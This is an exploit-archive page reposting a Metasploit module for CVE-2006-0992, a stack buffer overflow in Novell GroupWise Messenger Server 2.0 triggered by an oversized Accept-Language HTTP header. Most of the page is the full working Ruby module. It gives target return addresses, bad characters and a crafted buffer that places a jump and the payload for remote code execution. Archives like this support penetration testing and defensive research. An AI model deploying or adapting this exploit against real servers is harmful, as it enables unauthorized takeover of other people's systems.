what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Novell Messenger Server 2.0 Accept-Language Overflow

Novell Messenger Server 2.0 Accept-Language Overflow
Posted Nov 26, 2009
Authored by H D Moore | Site metasploit.com

This Metasploit module exploits a stack overflow in Novell GroupWise Messenger Server v2.0. This flaw is triggered by any HTTP request with an Accept-Language header greater than 16 bytes. To overwrite the return address on the stack, we must first pass a memcpy() operation that uses pointers we supply. Due to the large list of restricted characters and the limitations of the current encoder modules, very few payloads are usable.

tags | exploit, web, overflow
advisories | CVE-2006-0992
SHA-256 | a1d697bfa45ada6da52e8ea308f0c3606ce2221638b31aed1bbc0ddd602c35ab

Novell Messenger Server 2.0 Accept-Language Overflow

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Novell Messenger Server 2.0 Accept-Language Overflow',
'Description' => %q{
This module exploits a stack overflow in Novell GroupWise
Messenger Server v2.0. This flaw is triggered by any HTTP
request with an Accept-Language header greater than 16 bytes.
To overwrite the return address on the stack, we must first
pass a memcpy() operation that uses pointers we supply. Due to the
large list of restricted characters and the limitations of the current
encoder modules, very few payloads are usable.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2006-0992'],
['OSVDB', '24617'],
['BID', '17503'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0a\x2c\x3b"+ [*("A".."Z")].join,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
['Groupwise Messenger DClient.dll v10510.37', { 'Rets' => [0x6103c3d3, 0x61041010] }],
],
'DisclosureDate' => 'Apr 13 2006'))

register_options( [ Opt::RPORT(8300) ], self.class )
end

def exploit
connect

lang = rand_text_alphanumeric(1900)
lang[ 16, 4] = [target['Rets'][1]].pack('V') # SRC
lang[272, 4] = [target['Rets'][1]].pack('V') # DST
lang[264, 4] = [target['Rets'][0]].pack('V') # JMP ESP
lang[268, 2] = "\xeb\x06"
lang[276, payload.encoded.length] = payload.encoded

res = "GET / HTTP/1.1\r\nAccept-Language: #{lang}\r\n\r\n"

print_status("Trying target address 0x%.8x..." % target['Rets'][0])
sock.put(res)
sock.close

handler
disconnect
end

end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close